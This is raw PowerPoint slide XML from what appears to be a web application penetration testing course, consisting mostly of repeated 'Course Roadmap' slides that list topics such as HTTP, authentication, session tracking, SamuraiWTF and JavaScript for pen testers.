        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Course Roadmap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 1042"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="1981200"/>
            <a:ext cx="8458200" cy="41148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Attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>'s View, Pen-</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Testing, &amp; Scoping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Client-Side Discovery</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Capture the Flag</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="169989" name="Freeform 1044"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="blackWhite">
          <a:xfrm>
            <a:off x="5194300" y="152400"/>
            <a:ext cx="520700" cy="6248400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 328"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 328"/>
              <a:gd name="T3" fmla="*/ 0 h 3984"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 328"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T6" fmla="*/ 0 w 328"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 328"/>
              <a:gd name="T13" fmla="*/ 0 h 3984"/>
              <a:gd name="T14" fmla="*/ 328 w 328"/>
              <a:gd name="T15" fmla="*/ 3984 h 3984"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T8">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T9">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T10">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T12" t="T13" r="T14" b="T15"/>
            <a:pathLst>
              <a:path w="328" h="3984">
                <a:moveTo>
                  <a:pt x="0" y="1445"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="109" y="963"/>
                  <a:pt x="219" y="482"/>
                  <a:pt x="328" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="328" y="3984"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="219" y="3105"/>
                  <a:pt x="109" y="2324"/>
                  <a:pt x="0" y="1445"/>
                </a:cubicBez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
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 1043"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5715000" y="152400"/>
            <a:ext cx="3276600" cy="6573672"/>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spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" i="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Why the Web?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Web App Pen Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Web Site Server Architecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> The HTTP Protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> HTTP Methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>HTTP Status Codes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>WebSockets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Exercise: Examining HTTP</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>    Requests and Responses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Client Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Exercise: Client Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Session Tracking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> HTTPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Exercise: Analyzing HTTPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> SamuraiWTF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Penetration Testing Types and </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>   Methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Web App Pen Test Components</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Reporting and Presenting Findings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Attack Methodology</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Types of Flaws</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>JavaScript for Pen Testers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Statements, Variables,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Functions, &amp; Events</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> The DOM, Methods, and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Properties</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> AJAX and XMLHttpRequest</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> JavaScript Exercise</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041"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="219075" y="152400"/>
            <a:ext cx="8734425" cy="1175273"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Course Roadmap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangle 1042"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="1981200"/>
            <a:ext cx="8458200" cy="41148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Attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>'s View, Pen-</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Testing, &amp; Scoping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 Cont.</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Capture the Flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Freeform 1044"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="blackWhite">
          <a:xfrm>
            <a:off x="5194300" y="152400"/>
            <a:ext cx="520700" cy="6248400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 328"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 328"/>
              <a:gd name="T3" fmla="*/ 0 h 3984"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 328"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T6" fmla="*/ 0 w 328"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 328"/>
              <a:gd name="T13" fmla="*/ 0 h 3984"/>
              <a:gd name="T14" fmla="*/ 328 w 328"/>
              <a:gd name="T15" fmla="*/ 3984 h 3984"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T8">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T9">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T10">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T12" t="T13" r="T14" b="T15"/>
            <a:pathLst>
              <a:path w="328" h="3984">
                <a:moveTo>
                  <a:pt x="0" y="1445"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="109" y="963"/>
                  <a:pt x="219" y="482"/>
                  <a:pt x="328" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="328" y="3984"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="219" y="3105"/>
                  <a:pt x="109" y="2324"/>
                  <a:pt x="0" y="1445"/>
                </a:cubicBez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
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 1043"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5715000" y="152400"/>
            <a:ext cx="3276600" cy="6573672"/>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spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" i="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Why the Web?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Web App Pen Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Web Site Server Architecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> The HTTP Protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> HTTP Methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>HTTP Status Codes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>WebSockets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Exercise: Examining HTTP</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>    Requests and Responses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Client Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Exercise: Client Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Session Tracking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> HTTPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Exercise: Analyzing HTTPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
